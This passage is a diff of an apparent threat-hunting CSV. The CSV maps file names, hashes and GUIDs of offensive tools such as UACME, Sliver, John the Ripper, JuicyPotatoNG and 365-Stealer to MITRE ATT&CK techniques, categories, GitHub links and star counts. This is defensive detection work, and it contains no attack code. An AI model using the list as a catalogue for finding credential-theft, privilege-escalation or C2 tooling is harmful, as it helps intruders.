TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" "*1C5EDA8C-D27F-44A4-A156-6F863477194D*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*1E70D62D-CC36-480F-82BB-E9593A759AF9*","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","N/A","7","3","267","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*1f047faec08d9a35c304fb4a7cf13853589359a8f7cbfdd48c5d5807712dcf05*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - 
T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*1f25c454ae331c582fbdb7af8a9839785a795b06a6649d92484b79565f7174ae*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*1HeroYcNYMhjsq8RYCx1stSaRZnQd9B9Eq*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*1mil-AD-passwords.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*1N3/Sn1per*","offensive_tool_keyword","Sn1per","Automated Pentest Recon Scanner.","T1083 - T1087 - T1518","TA0001 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/1N3/Sn1per","1","0","N/A","N/A","10","6901","1737","2023-09-29T22:14:24Z","2015-09-06T15:47:38Z" -"*1N73LL1G3NC3x/Nightmangle*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - 
TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" -"*1password2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*1N3/Sn1per*","offensive_tool_keyword","Sn1per","Automated Pentest Recon Scanner.","T1083 - T1087 - T1518","TA0001 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/1N3/Sn1per","1","0","N/A","N/A","10","6905","1738","2023-09-29T22:14:24Z","2015-09-06T15:47:38Z" +"*1N73LL1G3NC3x/Nightmangle*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","1","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*1password2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*2_lyncbrute.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*207953846cc26417e163db3dc483a65e8e94bc9bd86c8928d59b078f1e72fcc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*210A3DB2-11E3-4BB4-BE7D-554935DCCA43*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*207953846cc26417e163db3dc483a65e8e94bc9bd86c8928d59b078f1e72fcc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*210A3DB2-11E3-4BB4-BE7D-554935DCCA43*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" -"*215a9f9095e89c79b342aed5625bbc6d660b910cd15a06ac4a072e8860c3e2c6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*215a9f9095e89c79b342aed5625bbc6d660b910cd15a06ac4a072e8860c3e2c6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*22A156EA-2623-45C7-8E50-E864D9FC44D3*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" "*23975ac9-f51c-443a-8318-db006fd83100*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" -"*23A2E629-DC9D-46EA-8B5A-F1D60566EA09*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*23af06a7987966a7e51336b3cdd33b411fa05778ec14179a50a60fa0f6aee1af*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*23A2E629-DC9D-46EA-8B5A-F1D60566EA09*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*23af06a7987966a7e51336b3cdd33b411fa05778ec14179a50a60fa0f6aee1af*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*2419CEDC-BF3A-4D8D-98F7-6403415BEEA4*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - 
TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*261f880e-4bee-428d-9f64-c29292002c19*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" -"*27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*273987ab3fcc9a7e9976a73ff8c6986e6e397fc3b9f179ce23991814f694a843*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*282383cd8223cd0d36f4bf09501830ae1dd01aacaf483e9e95fa4938345453b7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*273987ab3fcc9a7e9976a73ff8c6986e6e397fc3b9f179ce23991814f694a843*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*282383cd8223cd0d36f4bf09501830ae1dd01aacaf483e9e95fa4938345453b7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*29446C11-A1A5-47F6-B418-0D699C6C3339*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" 
"*2944dbfc-8a1e-4759-a8a2-e4568950601d*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" "*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" -"*2a08385892845104b4f07d693ca395eba3a09e4aa89ad791be3807919316ed67*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
-"*2aa21c51a100de781b6647b04bb0371a6205a7b1dc22a3eeae058ec4cb80fd5f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2a08385892845104b4f07d693ca395eba3a09e4aa89ad791be3807919316ed67*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2aa21c51a100de781b6647b04bb0371a6205a7b1dc22a3eeae058ec4cb80fd5f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" 
"*2CFB9E9E-479D-4E23-9A8E-18C92E06B731*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*2D863D7A-A369-419C-B4B3-54BDB88B5816*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","0","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" -"*2e64396f0b5cc2f6e59f5d329ffbb1ef0e6dd5e0547bd6fff5567f72cca6ace9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*2ee6204d65c00011c64b84383bfd8a3dc04149ff681df8ee86acbbea4ba73aa1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*2john.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*304D5A8A-EF98-4E21-8F4D-91E66E0BECAC*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*2e64396f0b5cc2f6e59f5d329ffbb1ef0e6dd5e0547bd6fff5567f72cca6ace9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2ee6204d65c00011c64b84383bfd8a3dc04149ff681df8ee86acbbea4ba73aa1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*2john.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*304D5A8A-EF98-4E21-8F4D-91E66E0BECAC*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*33BF8AA2-18DE-4ED9-9613-A4118CBFC32A*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*365-Stealer.py*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*365-Stealer-master*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" -"*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. 
